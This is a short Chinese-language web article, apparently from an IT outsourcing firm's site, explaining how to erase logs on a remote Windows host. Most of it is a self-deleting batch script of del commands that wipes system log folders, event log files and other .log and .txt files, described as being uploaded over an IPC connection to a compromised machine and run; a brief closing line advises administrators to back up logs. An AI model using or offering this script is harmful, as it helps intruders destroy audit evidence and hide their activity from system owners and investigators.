怎么清除遠(yuǎn)程主機(jī)上的日志？

2013-09-16 10:16 作者：ly 瀏覽量：

　　今天艾銻無(wú)限給大家介紹的清除遠(yuǎn)程主機(jī)上的日志的方法是：自己編寫批處理文件來(lái)實(shí)現(xiàn)。

　　編寫一個(gè)能清除日志的批處理非常簡(jiǎn)單，新建一個(gè)文本文檔，在其中輸入以下內(nèi)容： 

   @del c:\windows\system32\logfiles\*.* 

   @del c:\windows\system32\config\*.evt 

   @del c:\windows\system32\dtclog\*.* 

   @del c:\windows\system32\*.log 

   @del c:\windows\system32\*.txt 

   @del c:\windows\*.txt 

   @del c:\windows\*.log 

   @del c:\del log.bat （實(shí)際使用時(shí)，視具體位置而定）

   把上面的內(nèi)容保存為log.bat備用。在上面的代碼中“@”前綴字符表示執(zhí)行時(shí)本行在命令行或DOS里面不顯示。之后黑客通過(guò)IPC連接將log.bat文件上傳到被入侵主機(jī)或肉雞上，將log.bat文件執(zhí)行以下就可以了。

　　除此之外，還可以利用第三方軟件等方法來(lái)實(shí)現(xiàn)清理目的，大體原理都一樣。作為管理員應(yīng)定期備份日志文件，防止被入侵后清空日志。另外可以把日志文件的路徑更改，預(yù)防黑客用批處理文件清理日志。

艾銻無(wú)限是國(guó)內(nèi)領(lǐng)先IT外包服務(wù)商，專業(yè)為企業(yè)提供IT運(yùn)維外包、電腦維護(hù)、網(wǎng)絡(luò)維護(hù)、辦公設(shè)備維護(hù)、服務(wù)器維護(hù)、數(shù)據(jù)備份恢復(fù)，門禁監(jiān)控等多項(xiàng)IT外包服務(wù)。做為一家企業(yè)IT服務(wù)提供商，我們有責(zé)任也有義務(wù)為企業(yè)提供IT外包的相關(guān)信息，為企業(yè)的發(fā)展提升更高的效率，創(chuàng)造更大價(jià)值。歡迎您來(lái)電咨詢：400-650-7820. 更多的IT外包信息盡在艾銻無(wú)限 http://www.richjn.cn